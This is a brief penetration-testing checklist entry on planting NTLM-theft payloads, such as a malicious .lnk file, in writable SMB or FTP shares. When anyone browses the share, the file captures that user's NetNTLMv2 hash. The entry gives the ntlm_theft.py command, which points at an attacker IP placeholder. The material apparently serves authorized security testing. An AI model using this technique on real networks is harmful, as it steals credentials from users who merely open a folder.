Check Upload to SMB/FTP
checklist
Summary
Drop the malicious file in a writable share to coerce NTLM auth.
Walkthrough
Test writable SMB/FTP shares and plant NTLM-theft payloads (e.g. malicious .lnk) that fire when browsed. A hit captures a NetNTLMv2 hash from any user who opens the directory.
Commands
bash
python3 ntlm_theft.py -g lnk -s <ATTACKER_IP> -f vault